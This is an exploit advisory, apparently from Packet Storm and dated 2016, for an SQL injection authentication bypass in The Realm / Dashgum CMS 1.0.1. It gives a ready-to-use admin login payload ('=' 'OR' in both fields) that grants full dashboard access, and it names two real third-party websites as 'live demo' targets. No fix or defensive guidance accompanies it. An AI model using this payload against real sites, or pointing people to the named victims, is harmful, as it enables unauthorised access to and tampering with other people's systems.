The Realm / Dashgum Software CMS version 1.0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
d1741127af5c30842ce69d01f0c198cbdaf847521e96423a529c1ac82ec16827######################
# Exploit Title : The Realm / Dashgum Software CMS Admin Page ByPass
# Exploit Author : xBADGIRL21
# version The Realm : 1.0.1
# version Dashgum : v2
# Vendor : http://www.bluthemes.com/item/realm -
http://gridgum.com/themes/dashgum-bootstrap-dashboard/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/10
# video Proof : https://youtu.be/u8CDfPSbwOI
######################
# Describe :
# This Exploit Allow The Attacker to bypass the admin
# page info.
# Login to the admin Dashboard Give you Full Access to
# Upload or Delete .....etc
# PoC:
# Put [admin] After url such as :
# http://site.com/admin
# Now enter fill username or email and Password like the information below :
# Username: '=' 'OR'
# Password: '=' 'OR'
#
# Live Demo :
# http://khasbagh.com/admin/
# http://www.linikantech.com/admin/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed